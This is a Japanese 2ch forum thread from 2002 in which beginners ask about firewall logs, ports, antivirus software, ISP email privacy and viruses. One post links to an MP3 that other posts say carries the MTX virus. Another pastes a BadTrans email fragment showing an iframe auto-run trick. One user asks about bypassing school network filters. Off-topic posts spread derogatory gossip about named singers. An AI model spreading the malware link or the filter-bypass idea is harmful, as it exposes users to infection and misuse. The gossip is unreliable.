回答がすぐさま返ってくるとでも思ってるのか?
最低半日待てよ
複数のスレで同じ質問見ると答える気なくなるよな〜
551530:02/01/28 03:36
>>538

パソコン暦はPC-6001からですが何か?

遅レス御免
>>551
セキュリティ厨房、死んでくれ。
>>551
いつまでたってもスキルがアップしないやつってことよ
よう じいさん
554名無しさん@お腹いっぱい。:02/01/28 08:40
すいません、質問なんですが、トロイを仕込まれているか調べるにはどんなサイト・
ソフトを使えばいいのでしょうか。
>>554
ノートンかバスターを使え 買ってこい
556http://nara.cool.ne.jp/mituto:02/01/28 10:08
3月24日〜27日に立命館大学BKCに田中洸人氏が来ます。
http://210.172.69.179/jps_search_02au
http://nara.cool.ne.jp/mituto
madokaにひっかかってしまいました。

windows2000なんですが手動で削除しようとして
C:をmadoka.exeとozawa.exeで検索したんですが全然ひっかからないんです。
win.iniとsystem.iniも見てみたんですがrun=って項目が見当たらないようです。
windows2000は削除方法が違うんですか?


>>557
トレンドマイクロのページを見て対処

ウイルス対策ソフトを持ってなさそうなので買ってこい
559名無しさん@お腹いっぱい。:02/01/28 11:51
>>555
バスターってなんですか?
アンチウイルスソフトとファイヤーウオールソフトどっちを買えばいいのでしょう?
>>559
ウイルスバスター

たいていはパックで売ってるから両方買え
561名無しさん@お腹いっぱい。:02/01/28 13:41
アタックやハックをされているか心配ならコマンドプロントで見てみろといわれ
チェックをしてみていたのですが、その中に覚えのないアドレスが見つかりました。
そのアドレスの入ってるようなHPも開いていないし覚えがないんですが
これがアタックされているということなのでしょうか。
ESTABLISHEDと出ていました。どうやって見れば良いのでしょうか。
>>561
ファイヤーウォールを入れてみろ
が正解だな

それはポートが開いているかどうかのコマンドをいれたんだろ
>>561
メル鯖かどっかのHP見たときの広告の鯖じゃないかな。
心配なら書いてみ。ポートも
564_:02/01/28 15:24
HackTrackerってファイヤーウォールソフトの
traceneがカコイイっていうんで調べたら
日本語の製品版が出てないみたいなんですけど
入れてる方いますか?
イイっすか?
netstat -aと入れてみました。サーチ使って調べたら直前に見ていたHPらしく安心しました。
ファイヤーウォールはゾーンアラームを入れてるのですが(フリー版)
やっぱりノートンなどを買って入れた方が良いのでしょうか。
それからアドレスのあとに「:HTTP」などと出ますよね?
あれが違うものだとまずかったりなどとあるのですか?
566よろしこ:02/01/28 15:40
アジア太平洋ネットワーク情報センター株式会社(APNIC)の詳細キボー
なんか2chと関係あり?2chやってるとアタックにこられるのですが...?
よろしこ
567566:02/01/28 15:43
調査依頼したほうがいいですかね?
568名無しさん@お腹いっぱい。:02/01/28 15:47
無駄かと...?>>567
569567:02/01/28 15:48
よく解かりました。ありがとう。
>>566
それって2ch.netをWHOISしたことを言ってるんだろうなぁ・・(ボソッ

2chのプロクシポートチェックです。プロクシ経由の書き込みをはじくための。
571名無しさん@お腹いっぱい。:02/01/28 16:12
すいません。
会社からなんで過去ログ参照できなくて・・・
厨な質問させてください。
ZoneAlarm入れたら「iana.orgからのアクセスをブロックした」
って言われたんですが、iana.orgって何者ですか?

ガクガクブルブル
573571:02/01/28 16:36
>>572
どーしよーもない質問の解答、ありがとうございます。
安心しました。もっと勉強せねば!
へ??
何故にIANA??
勝手に予約済みポート、別のサービスで使用してると怒られるの??
何をブロックしたのかは不明・・
RFC1918の事じゃないのかな?前もどこかで見かけたような。
プライベートIPアドレスからのアクセスをianaと表示する、
PFWがあったような。無かったような。
>>576
ってことは実際にiana.orgからなにか来てるわけではないと、誤報と考えてもいいわけだ。
578名無しさん@お腹いっぱい。:02/01/28 17:06
教えてください。
プロバイダ−は会員のメ−ルなどをいかなる
場合であろうとも、覗き見すると
プライバシ−の侵害で刑事責任を問われるのでしょうか?
>>578
覗き見ますよ、って会員規約に書いてたらOKじゃないか?w

見られたくなければPGPを使う

PGPってすごく良いの?
http://pc.2ch.net/test/read.cgi/sec/1001427071/
580名無しさん@お腹いっぱい。:02/01/28 17:15
いきなりダイアログが出てきて、IPアドレスxxx.xxx.xx.xxxはハードディスク
のアドレスxx:xx:xx:xx:xxと競合していることが検出されました。
と出てきたのですが、これはどういう状況が起きているんでしょうか?
どなたか教えて頂きたい(T_T)
581578:02/01/28 17:29
普通は見てもいいのでしょうか?
>>577
不遇にもianaからHybrisが届いちゃった人を知ってるので、
絶対無いとは言い切れないけど(w

LAN組んでる人でアドレス偽装するなり
チマチマ変更する根気のある人はどう表示されるかレポートきぼんぬ。
10.0.0.128
172.16.0.128
192.168.0.128
0.0.0.128
169.254.0.128
192.0.2.128
224.0.0.128
240.0.0.128
>>580
書いてある通り
OSもPC環境も不明なので何も教えられない
>>581
見ようと思えば見れるけど 見る奴はいない
でもメールのパスワードがそのままだったらいたずら好きの社員がこっそり見てるかもね

そんなこと言ったらNTTはすべての通話を社内で聞くことができる
ってことにもなるな
>>581
>普通は見てもいいのでしょうか?

プロバイダ社員さんハケーン!!
>>578
ヘッダは宛先と同義と解釈されるから管理者なら見ても問題ない(らしい)。
本文を無断で見るのは難しいかもねえ。
root宛てにエラーメールが大量に届く事はあるけど、
これは見ても問題無いハズ。(他に見るひと居ないし)
まだ大手なら数も多くてあれだけど、ちいさいプロバイダならちょっと怖いねぇ・・
588名無しさん@お腹いっぱい。:02/01/28 19:59
板違いだったらごめんなさい。初めて書き込みます。
うちはCATV接続でウィルスバスター2002を入れてます。
お正月明けから同じIPからのアクセスがFWのログに貯まってます。
1日に時間を変えて10回以上port1027へアクセスしてるようです。
全てクローキングになっているので問題はありませんが…。
検索で調べたのですがport1027が何をするところなのかよく分かりませんでした。
IPの上6桁がうちと同じなので同じプロバイダのユーザーと思われます。
相手がセキュリティ対策をしてないということなのでしょうか?
契約プロバイダではセキュリティを導入していないユーザーには、苦情が集まれば
対策をとるように指導しているようなのですが…。
連絡した方が良いのでしょうか?
あとport1027に関しても教えていただけたら嬉しいです。
初心者ですみませんがよろしくお願いします。

>>588
君が狙われてるのでは?
もしくは相手がトロイなどに感染してて気がついていないと言う可能性もあるけど
毎日同じとこからくるようならCATV会社に言え
>>588
それはホントにアクセス「されてる」のかい?
アクセス「してる」んじゃ無いのかな?
だとしたら、「至急対策お願いします」って言ったら、
自分がネットできなくなるかもね(w
>>588
port1027はウェルノウンポートじゃないし特になにかに使われるポートではなさそう。
http://www.iana.org/assignments/port-numbers

あんまりしつこいようならプロバイダに連絡した方がいいかも。
>>552>>553 は人間性が厨房らしい…
593588:02/01/28 20:59
>>590
受信/送信の所は「受信」、プロトコルは「UDP」になってます。
この場合でもうちからアクセスしてる場合があるのでしょうか?
一応定義ファイルの更新とスキャンは2,3日おきにやってますが問題ないようです。

>>591
port1027は特別なことに使われる所ではないのですね。
もう少し様子を見て連絡するかどうか、検討することにします。

皆さん、どうもありがとうございました。
>>593
まさかソースポートが53じゃねーだろーな。
595(゜▼゜*):02/01/28 21:53
>>593
それはウィルスバスターのファイアーウォールの
セキュリティレベルを「高」にしてるのでは?

http://eazyfox.tripod.co.jp/Firewall/VirusBas/VB2002/VirusB021.htm
…によれば、
「高」…クローキングによるアクセス制限
自PCからのアクセス以外は遮断する。
つまり外部からのアクセスは許可しない。

…となってますが、
UDPの場合元々コネクションレス(投げっぱなし)のプロトコルなので、
外部からのアクセスなのか、それとも自分から要求した返答パケットなのか、
判断のしようがないのですよ。
だから、たとえ必要な返答パケットであってもブロックされますし、
当然許可されてないアクセスとしてログにも記録されるハズです。

ウィルスバスターの場合ポート毎の設定は無理のようですし、
3段階のセキュリティレベルを一段階下げるぐらいしか方法はありませんが。
596名無しさん@お腹いっぱい。:02/01/28 22:27
自分のPCには今何もセキュリティソフト入ってないんですけど
危ないでしょうか?
NIS2002が、相性が悪いらしくアンインストールしてしまいました。
ウイルスバスターとか、買ったほうがいいでしょうか?
それとも、ウィルススキャンとか・・・。
ああ・・、もう貯金が・・。
失敗が恐くて変えません。いまだにウィンドウズ98なんです・・。
損害賠償で破産する前になんらかの対策を取る事をすすめます。
取り敢えず周りにある英字タイトルのスレを読んで下さい。
>>596
相性悪いんじゃなくて、使い方が悪いだけだと思われ
599588:02/01/28 22:34
>>594
ソースポート?ごめんなさい、よく分からないのですが送信元ポートのことですか?
送信元ポートは1900です。

>>595
確かにセキュリティレベルは導入当初から「高」にしてます。
その場合、自分が投げたか相手から投げられたか判断がつかないと…。
ただ、バスター導入当初はなくて、最近増えてきたので気になってしまいました。
実害がなければ良しということで、納得した方が良さそうですね。
頑張ってもっと勉強します。ありがとうございました。
600初心者:02/01/28 22:56
最近ADSLにしてセキュリティのことが気になってきました。
それでノートンかウィルスバスターを購入しようと思うんですが、
実際どちらの方が使いやすいんでしょうか?
アドバイスしてください。
>>600
どっちでも良い
使いやすさは人それぞれ
602巡回広報:02/01/28 23:41
新しいウィルスMypartの対策を忘れずに

☆ウィルス情報&質問 総合スレッド☆
http://pc.2ch.net/test/read.cgi/sec/1010948022/l50
603名無しさん@お腹いっぱい。:02/01/28 23:57
>>600

>>3
それぞれの専用スレを読んでみては?
604名無しさん@お腹いっぱい。:02/01/29 00:07
WIN XPのFWのログにこんなのがあったんですが
ポート番号から先の意味がわかりません。
ルーターでインバウンドTCPはフィルタリングしてるのですが
このログはヤバいのでしょうか?

#Verson: 1.0
#Software: Microsoft Internet Connection Firewall
#Time Format: Local
#Fields: date time action protocol src-ip dst-ip src-port dst-port size tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info

2002-01-27 15:24:29 DROP TCP 211.13.211.2 192.168.0.2 80 3068 40 A 609914560 2141314058 33580 - - -
605初心者:02/01/29 00:11
>>601-603
どうもありがとうございます。
いろいろ調べたんですけど、ノートンのSystem Works 2002 Professional
に決めました。
>>605
あれはファイアウォールは入ってないよね?
まぁ別に用意すりゃいいけど。
ZoneAlarmかTinyがおすすめ
607初心者:02/01/29 00:26
ttp://easyweb.easynet.co.uk/~hiros/virii00/METALLICA_SONG.MP3

さっきこれ踏んじゃったんですけど、どんなウイルスなんですか?
608名無しさん@お腹いっぱい。:02/01/29 00:31
セキュ板のみなさんこんばんわ。ニュー速+の住民のものです。
じつは、今日の田中マキコと鈴木ムネオの問題に関してムネヲ氏に講義メールを
送ったヤシがいるのですが、そいつがムネヲサイドから攻撃されているようです。
よろしかったら、対処方法などを教えてください。
問題のスレ
【政治】マキコvsムネヲNGO出席拒否問題総合スレッド-11
http://news.2ch.net/test/read.cgi/newsplus/1012225458/


153 名前:反省汁! 投稿日:02/01/28 23:03 ID:EqXFfr2E
ムネヲに実名&生IPで抗議してから、ずっとこんな感じだよぉ!

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 61.211.164.0
b. [ネットワーク名] TOK-HOUSE-01
f. [組織名] 衆議院事務局
g. [Organization] House of Representatives Secretariat
m. [運用責任者] TM2065JP
n. [技術連絡担当者] TM2065JP
p. [ネームサーバ] ns1.tok.pnap.net
p. [ネームサーバ] ns2.tok.pnap.net
y. [通知アドレス] [email protected]
y. [通知アドレス] [email protected]
[割当年月日] 2001/11/27
[返却年月日]
[最終更新] 2001/11/28 10:32:08 (JST)
[email protected]

21時から定期的にアクセスしてきてるよ。
何がしたいのかなぁ?(プッ
609名無しさん@お腹いっぱい。:02/01/29 00:31
続き。


255 名前:反省汁! 投稿日:02/01/28 23:16 ID:tRGXb7W5
漏れ>>153なんだけど
マジでアクセスしてきてるんだよ。アクセスログ出しとくよ。
FWIN,2002/01/28,00:42:23 +9:00 GMT,211.162.130.18:3960,61.203.130.199:111,TCP (flags:S)
FWIN,2002/01/28,01:12:23 +9:00 GMT,216.10.244.50:2055,61.203.130.199:6970,UDP
FWIN,2002/01/28,01:13:48 +9:00 GMT,208.36.115.51:1233,61.203.130.199:6971,UDP
FWIN,2002/01/28,21:32:19 +9:00 GMT,61.139.44.66:2160,61.203.135.166:515,TCP (flags:S)
FWIN,2002/01/28,21:33:31 +9:00 GMT,61.211.164.41:12018,61.203.135.166:6970,UDP
FWIN,2002/01/28,21:35:17 +9:00 GMT,61.211.164.41:19310,61.203.135.166:6970,UDP
FWIN,2002/01/28,21:35:39 +9:00 GMT,61.211.164.41:19568,61.203.135.166:6970,UDP
FWIN,2002/01/28,21:52:15 +9:00 GMT,61.211.164.41:25554,61.203.135.166:6970,UDP

何がしたいんだ、衆議院事務局・・・どうしたら祭れるかなぁ?
>>607
MTXら。極悪なのら。
トレンドマイクロの2001年度感染報告数NO.1に輝いたろ。

http://www.trendmicro.co.jp/virusinfo/monthly_ranking/mvr2001_12.htm
>>607
マルチだね

>>608
勝手にやれ よけいなトラフィックを増やすな
>>609
関係ないのも混じってるだろ。。
あとログ晒したヤツもアフォだな。自分のIPアドぐらい隠せよw
>>609
盛り上がるのはケッコウだけど…
UDPのInだけじゃホントに向こうから投げたパケットかどうか判らないよ。
そいつのアクセスが原因の返答パケットじゃないのか?
614初心者:02/01/29 00:44
>>610,611
う〜、そうなんですか?(涙
対処としてまず何をすればよいんでしょうか?
君ら、知識もないのに勝手に盛り上がってるだけダヨ >>608-609
616名無しさん@お腹いっぱい。:02/01/29 00:56
>>612
自分のIPアド晒しているのはネタではない事と本人が言ってましたが・・・
617_:02/01/29 01:00
今日、感染してたんですけど
JS.EXCEPTION.GEN
JS.SEEKER.A4
ってどんなことされるんですか?

検索したらトロイらしいとはわかったんですが・・・。
>>617
ウイルス辞典を見れば分かるかと
619名無しさん@お腹いっぱい。:02/01/29 01:22
>>614
私もニュー速で同じの踏んだよ。
ノートン先生のおかげで大丈夫(たぶん、、不安。。。
620名無しさん@お腹いっぱい。:02/01/29 01:28
ノートンアンチウイルスver5.0を使っています。
そして今日、オートプロテクトが導入3年目に
して初めて働きまして、W95.MTX.drというのが見つかりました。
その後、検疫という項目の所に追加されました。
特に必要なファイルじゃなかったので、わたしは、項目から
削除を選択したのですが、私の処理の仕方は正しいのでしょうか?
マニュアルを読んでみたのですが、その事についての
記述は薄かったので、少し不安なのですが・・・・。
どなたか詳しいかた、教えて下さい。お願いします。
621620:02/01/29 01:31
すいません過去ログ読んでおりませんでした。
私も>>607さんと同じ物を踏んだんです。
>>620
それでよい

っていうかそんな古いバージョン使ってていいのか?
定義ファイルは更新してるのか?
623620:02/01/29 01:34
>>622
返答ありがとうございます。
定義ファイルは更新できます。
最新のを使っております。
なんで踏んじゃうのか分からん。
625マッカー:02/01/29 02:26
すみません。
MACを使ってるのですがときどきデスクトップの文字がすべて真っ白になってしまう事があります。
フォルダ名の文字もブラウザの文字もすべて真っ白で読めなくなります。
ウイルスなのでしょうか?
どなたか教えてください。
>>625
デスクトップの再構築をやってみな
ウイルスではないと思われ
627名無しさん@お腹いっぱい。:02/01/29 07:26
フレッツADSLってゆーか・・・
「フレッツ」ってのは、夜だけじゃなくて昼間も(つまり一日中)
使い放題って事ですか?
628名無しさん@お腹いっぱい。:02/01/29 07:26
★浜崎あゆみ、ライブで足の不自由なファンを吊るし上げ★

人気歌手・浜崎あゆみが、ファンに暴言を吐いた。
最前列で座っている足の不自由なファンに対し、
「前の方、座らないで下さ〜い」「どう思う?座ってたよ今!」
「一番前で観てんのに座ってたよ〜?」「感じ悪いね〜」
と、そのファンに暴言の雨あられ。会場はあゆ支持の歓声を上げ、
ついにはそのファンはその場で泣き出してしまう。
あゆは気にせず、自分のニューアルバムの話を切り出した。
このファンは熱心なあゆファンで、当日も最前列に座っていた。

★実際の音声
http://www.geocities.co.jp/Milano-Cat/2976/ayu_CDL_MC.mp3(2.28MB)
http://www.geocities.co.jp/Playtown-Dice/5199/ayu_CDL_MC.mp3(78.8KB)

★実際の映像
ttp://isweb40.infoseek.co.jp/computer/imode85/cgi-bin/up/upload/009.mpg
(直リンだと見えないのでコピペして下さい)

詳しくはこちら↓
http://choco.2ch.net/news/
http://tv.2ch.net/ami/
629_:02/01/29 07:32
日付: 2002/01/29 時刻: 6:27:34
未使用ポート遮断機能が通信を遮断しました。 詳細:
インバウンド TCP 接続
リモートアドレス、 ローカルサービスは 216.160.193.39,6699

ノートン先生のログです。
一番新しいものですが、これと同様にポート6699を狙ったものが昨日から何十回もありました。

上に書いたIP以外からも同じポート6699を狙ったアタックを受けています。
こちらのIPを変えてみても同じようなアタックを受けます。
whoisで調べたところKDDIなどが引っかかりました。

これは狙われているのでしょうか。
なぜIPを変えても相手には自分を攻撃できるのでしょう。
6699はトロイ、WINMXで使用されるらしく、少々怖く思っています。
「ファイルの内容を0バイトのデータに書き換える」ってウィルスが
あるみたいですけど、OS再インストールの際のバックアップ用に
CD-Rにデータを焼いたら、ファイルはあるけど中身が0バイトってのがありました。
これは単なるCDの焼きミスでしょうか?
それともウィルスに感染したからなのでしょうか?
ちなみに、そのCD-Rの中身は一部上記のような現象になり、
それ以外はちゃんと中身があるものでした。
元データはHDDの中をすべてキレイに消しちゃったのでありません。
631ななし:02/01/29 08:05
>>630
ff数字で始まる奴?バグだと思っていたけど。
>>627
そう
>>629
だろうね
誰かに恨まれてるか適当なIPアドレスを攻撃されてるかのどちらか
ノートン入ってるなら問題ないでしょ

セキュリティが甘いポートを突かれるのは当然のこと
634名無しさん@お腹いっぱい。:02/01/29 09:54
ICQではオンラインの相手のIPがわかりますけど、
MSNメッセやYahooメッセでも相手のIPはわかりますか?
635名無しさん@お腹いっぱい。:02/01/29 10:59
メーラはOEを使ってます。
受信メールを開かないでもウイルスにやられるってことあります?
もちろんプレビューはOFFにしてあるとして。
636名無しさん@お腹いっぱい。:02/01/29 12:18
普段は使わないときは必ず回線切ってますが、
昨日はチャット中に寝てしまいました。
今朝起きて状況を見ると、こんな表示が出てましたが
ブロック出来たと思ってよいのでしょうか?
ウイルスバスターの体験版を使用しております。
      ↓
不正アクセスの送信元:203.75.240.83
不正アクセスの種類:NetBIOS Browsing
送信バイト:18.820.601
受信バイト:319.603:068
>>635
メール以外で感染するウイルスもたくさんある

>>636
そう
でもけちけちせずに製品版を買え
638635:02/01/29 12:52
>>637
では、メールに限ると、受信しただけで、オープンしなければ
感染は有り得ない?
>>638
今のところはそういうウイルスはない

そんなにいやならOE使わなきゃいいのに
640578:02/01/29 13:15
実は1年前に住所が移転したのですが、
移転したということをプロバイダ−に届けていなかったのです。
すると先日、プロバイダ−から僕の携帯(知るはずのない)
に以下のような電話がありました。


「現在工事中につきネットを利用できないことを
お詫びします。実はこの件は自宅に郵送させていただいたのですが
、書類が自宅に届かずにこちらへ返送されてきました。
住所の移転をされたようですねえ。それで申し訳ないのですが、
連絡のしようがありませんので、メ−ルを読ませていただいて
携帯電話の番号を調べさせていただきました。」


このような電話がきたのです。プロバイダ−の不手際でネットが
使用できなくなって、それを連絡できないからといって会員のメ−ル
を無断で盗み読みして携帯の番号を調べ出して電話してきたのです。
また住所を移転したといっても同市内での移転であり、
家の電話番号は変更していません。家の電話番号はプロバイダ−
に登録してあるので、連絡事があればとりあえず家に電話
すればいいはずです。また書類を送る場合
でも移転先を調べることぐらいできるはずです。
それなのにそれを連絡できないからといって、会員のメ−ルを無断で
盗み読みして僕が友人たちとやり取りしているメ−ルに書いてあった
携帯番号を見つけ出して電話してきたのです。
これは十分に刑事責任を問えると思うのですがどうでしょう?
分かる方いましたら教えてください。お願いします。
>>640
そのプロバイダってどこよ?
すげえ恐いな

電話の内容は録音してあるのか?
だったら十分訴えられる
なんなら2ちゃん内で祭ってもいいと思われ
>>634
P2Pなら分かる
643名無しさん@お腹いっぱい。:02/01/29 14:11
ブラウザクラッカーって何ですか?
644名無しさん@お腹いっぱい。:02/01/29 14:52
643じゃないが、ブラウザクラッカーについて知りたい。
IE使ってると、たまに画面がごちゃごちゃ重なってきて、
読めなくなる。IEの画面だけじゃなく、デスクトップもごちゃごちゃになる。
ネスケを立ちあげると、ネスケの窓内は正常。
これって、クラッカーされてるの?
再起動するとなおるから、気にしてないけど。
ナビスコプレミアムクラッカー
ブラウザクラッカーって初めて聞いた
サイコクラッシャーーーー
>>634
>ICQではオンラインの相手のIPがわかりますけど、
バグあったけど対処されてるみたいだよ。
だからサーバー経由ならIPわかりません。
直接続(P2P)ならどうやったってバレるけど。

>MSNメッセやYahooメッセでも相手のIPはわかりますか?
こっちも>>642さんの言うとおりP2P接続ならバレる。
メッセージ送るだけならサーバー経由。
ファイル転送はP2P。
649 :02/01/29 18:05
>>643-644
いわゆる「ブラクラ」ブラウザクラッシャーのことだとすれば、
ページを見た時にプログラムが実行されて、IEの
「新しいウィンドウを開く」が次々と実行される。
困ったことに、WIN95/98/MEではリソースの制限つうものがあり、
沢山開かれるとほぼ確実におかしなことになる。
たいていはフリーズ(何も受け付けなくなる)だろうな。

2chあたりで、怪しげなURLにリンクがあり、
誰かが「↑ブラクラ」なんて書いているのはこういう意味。

>>644のはそういうブラクラページを見た
(ブラクラ踏んだとかいう)のではなさそうだけど、
要は窓の開きすぎではないかな。
IEは特に沢山開くと表示が遅くなったりおかしくなったりしがち。
OSとの融合性も高いのでデスクトップに影響があるかも。
あんまり沢山開かず、不要な窓を閉じるようにするといい。
(かつある程度使ったら再起動)
ただし、WIN NT/2k/XPだと、あまりそんなことにはならないはずだが。
>>648
SOCKS串さす、って方法もあるけど使えるのはなかなかないねぇ・・。

>>649
そうそう、NT系なら実質リソース∞だから、メモリ十分あればブラクラもかなり耐えられる!
グロは無理!
651644:02/01/29 21:52
>>649
なるほどね、確かにたくさん窓開くとなりやすい。
ちなみに、Win95のIE4使ってる。
使わないときはサスペンドなんで、再起動は固まったときしかしない。
それらが、原因か。
>>650 グロって何?

652名無しさん@お腹いっぱい。:02/01/29 23:48
プロクシのログの取得はどうすればいっすか?
( ゚Д゚)ポカーン
654名無しさん@お腹いっぱい。:02/01/30 00:00
某プロバイダのスペースで、サイトを開いてます。

ファイルを転送するたびにノートンが
トロイの木馬のデフォルト遮断 のセキュリティ警告を表示しました
リモートコンピュータ(***.***.***.**)という警告を出します。

攻撃元はいつも一緒。あまりにもウザイのでドメインSEARCHで
調べサイトへ飛んでみたら、サイトを開いてる某プロバイダに
行き着いてしまいました。

これって、プロバイダの社員が不正アクセスをしているのでしょうか。
>>654
ノートンの誤報
PASVモードにでもしる
もう上の方で見飽きてると思いますが質問させて下さい。
大馬鹿なことにニュース速報板でW95/MTX付きMP3へのリンクを
踏んでしまったんですが、感染するとHDD内に作られるという
ie_pack.exe、wid32.dll、mtx_.exeの3ファイルは見つかりませんし
レジストリのRunエントリにもウイルスによる改変はありませんでした。
また、このMP3自体はウイルススキャンソフトがキャッシュから見つけて
削除されたんですが、これ以外のファイルには感染が検出されませんでした。
これはシステムには感染していないと考えてもいいんでしょうか?
>>654
ノートンのことはよくわからないが、
FTPはクライアントPCからPort21でサーバと接続した後、
サーバからPort1023以上(Remote Port20)でデータ通信用の
コネクションが来るので、そのポートがたまたまトロイの木馬用に
使われてるポートと重なってた場合に検出されるのではなかろうか?
要するに誤検知くさいと思う。
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=PE_MTX.A
↑ここ飛べる??
んなら大丈夫。
踏んだだけなら大丈夫。保存した奴ダブクリしない限り。
但し、ブラウザのキャッシュには落ちてるけど。
ああ>>658>>656に対してね。
660656:02/01/30 00:34
>>658
そのアドレスには飛べました。キャッシュに入ってたやつは
駆除されたので大丈夫だと思います。
安心しました。レスどうもです。
661654:02/01/30 01:14
>>655-657
誤報なんてあるんですね。
狙われてるわけではなかったんだ、よかった。
教えてくださってありがとうございました。
662名無しさん@お腹いっぱい。:02/01/30 01:56
掲示板があらされ悔しい思いをしています。

掲示板のソースを見ると
<!-- Remote Host: wa-r01.wa.2iij.net, Time: 1012310051 -->
とありますが、これは生IPなのかそれとも串なのか?

何とかあらしを撃退したいのですが、よい方法をご教授下さい。
尚、私は掲示板の管理人ではありません。

問題の掲示板はここです。

http://6414.teacup.com/shigepero/bbs
>>662
もっと硬い板に移転汁。
orもっと硬い板作る。
>>662
プロクシかどうかは知らんが IIJ 経由のアクセスだ。
掲示板のログをメールに添付するなどして、相手が IIJ の会員なら
それ相応の処置を、プロクシならアクセスログを提出してもらえ。
それとプロバイダが自前の CGI の設置を許可しているのなら
663が言ってる通り、もっと硬い板を使ったほうがいい。
あるいは .htaccess を置かせてもらえるのなら wa-r01.wa.2iij.net
からのアクセスをキックしてもよい。

荒らしの書き込みは削除しても構わないが、それに反応しては駄目だ。
徹底的に無視しとけ。

Registrant:
Internet Initiative Japan Inc. (2IIJ-DOM)
Takebashi Yasuda Bldg., 3-13 Kanda
Nishiki-cho,
Chiyoda-ku,, Tokyo 101-0054
JP

Domain Name: 2IIJ.NET

Administrative Contact:
Miyoshi, Takamichi (TM003JP-JP) [email protected]
Internet Initiative Japan Inc.
Takebashi Yasuda Bldg.3-13
Kanda Nishiki-cho, Chiyoda-ku Tokyo
101-0054
JP
+81-3-5259-6000 (FAX) +81-3-5259-6001
Technical Contact:
Yamaguchi, Jiro (JY331) [email protected]
Internet Initiative Japan Inc.
Takebashi Yasuda Bldg.,
3-13 Kanda Nishiki-cho, Chiyoda-ku,
Tokyo
101-0054
JP
+81-3-5259-6000 (FAX) +81-3-5259-6001
665名無しさん@お腹いっぱい。:02/01/30 05:22
チャット中誰かにトロイを入れられそうになりました。
ノートン2002がキャッチ。
218.43.203.164
海外の人と複数で話してたのですが(韓国、イタリアなど)
どこの国のIPですか?
666ドキンちゃん:02/01/30 05:33
>>665 日本。
http://www.mse.co.jp/ip_domain/index.shtml
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 218.43.192.0-218.43.223.0
b. [ネットワーク名] OCN
f. [組織名] オープンコンピュータネットワーク
g. [Organization] Open Computer Network
m. [運用責任者] AY1361JP
n. [技術連絡担当者] MO081JP
n. [技術連絡担当者] KK551JP
n. [技術連絡担当者] IM657JP
p. [ネームサーバ] ns-kg001.ocn.ad.jp
p. [ネームサーバ] ns-kn001.ocn.ad.jp
y. [通知アドレス] [email protected]
[割当年月日] 2001/11/27
[返却年月日]
[最終更新] 2001/12/25 19:39:40 (JST)
[email protected]
667yayaya:02/01/30 09:57
学校のセキュリティ破りたいんですが・・・
学校自身がサーバーもっててホムペ開こうとしたらブロックしよるんです
無理ですか・・・
668名無しさん@お腹いっぱい。:02/01/30 10:00
>667
自分のがっこ? タイーホされるからやめとけ。
>>667
やぶったところでなにもできないからやめとけ
670665:02/01/30 10:41
ありがとう。
ではアタックしかけてきたこいつのアドレスは
665で載ってる通知アドレスなんですか?
>>670
知らん。おまえがこいつにやられたっていったんだろ。
つか、『トロイを入れられそうになりました』が
誤認識かもしれんと思いたくなった。
672578:02/01/30 11:51
>641
教えてください。
もし訴えたとしたら最悪の場合、そのプロバイダ−
はどうなるのでしょう?
673IE5.5も6も重くて糞:02/01/30 12:01
これってBAD-TRANS.Bですか?

<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>
--====_ABC0987654321DEF_====--

--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="SETUP.DOC.scr"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>

TVqQAAMAAAAEAAAA//8AALgA
674665:02/01/30 12:10
今になってアタックを受けた形跡が
ノートンからなくなりました。
これはなぜですか?
クラッカーに証拠隠滅されたのですか?
>>672
家宅捜索されるだろうね
676名無しさん@お腹いっぱい。:02/01/30 12:21
>>672
電気通信事業法違反なので、刑事的に以下のような刑罰を受けます。
さらに民事的に損害賠償や慰謝料を請求できるでしょう。

第四条(秘密の保護)
電気通信事業者の取扱中に係る通信の秘密は犯してはならない。

第百四条(第四条の罰則規定)
電気通信事業者の取扱中に係る通信の秘密を犯したものは一年以下の懲役又は三十万円以下の罰金に処する
二 電気通信事業に従事する者が前項の行為をしたとき二年以下の懲役又は五十万円以下の罰金に処する。
三 前二項の未遂犯は罰する。
コピペしたら大事なとこが抜けてた。

四条の二
電気通信事業に従事する者は、在職中電気通信事業者の取扱中に係る通信に
関して知り得た他人の秘密を守らなければならない。その職を退いた後においても、
同様とする。
678yayaya:02/01/30 12:54
>>669 カスケード接続ならいけると思ってるんですけど、どうですか?
やっぱり無理っすか?
( ´,_ゝ`)プッ 意味分かってないな
>>679
ここは初心者スレ。それは言っちゃいけない。

>>678
カスケード接続で出来る。

かもしれない。
>>679( ´,_ゝ`)プッ 意味分かってないな
>>681
オマエモナ
>>682 ( ´,_ゝ`)プッ 意味分かってないな
>>683
ということにしたいのですね:)
685名無しさん@お腹いっぱい。 :02/01/30 15:50
https://grc.com/x/ne.dll?bh0bkyd2 へ飛んでチェックしてみたの
ですが、

他の全てのポートは close という結果が出たのですが、

139 NetBIOS Stealth!
There is NO EVIDENCE WHATSOEVER that a port (or even any computer)
exists at this IP address!

と、ポート139が閉まってないようなのです。

これをそのまま翻訳サイトで訳してみたのですが

139 NetBIOS秘密!
ポート(あるいは任意のコンピューターさえ)が存在するNO EVIDENCE WHATSOEVER
があります、このIPアドレス!

と訳のわからない日本語に訳されます。

どなたか、私にわかりやすく説明していただけないでしょうか?
686685:02/01/30 15:59
解決しました。

上の方にリンクが貼られている
http://www.upsizing.co.jp/news/report0426.htm
このURLに飛んで読んだところ、139は開いてるのではなく
その存在自体隠しているという意味だとわかりました。
どうもお騒がせしました。
687名無しさん@お腹いっぱい。:02/01/30 19:07
■石黒彩 札幌西陵高校卒業
■飯田圭織 札幌稲西高校→ 代々木高校(定時制卒業?)
■安倍なつみ 登別高校→通信制高校(中退)
■中澤裕子 福知山高校卒業→大阪で風俗嬢
■保田圭 君津商業高校中退→マックでバイト
■矢口真里 瀬谷高校中退
■後藤真希 日出女子高校中退
■吉澤ひとみ 不明
■石川梨華 中卒
■小川麻琴 柏崎市立東中学
■新垣里沙 横浜市立橘中学
■高橋愛 福井県春江町立春江中学
■紺野あさ美 札幌市立中の島中

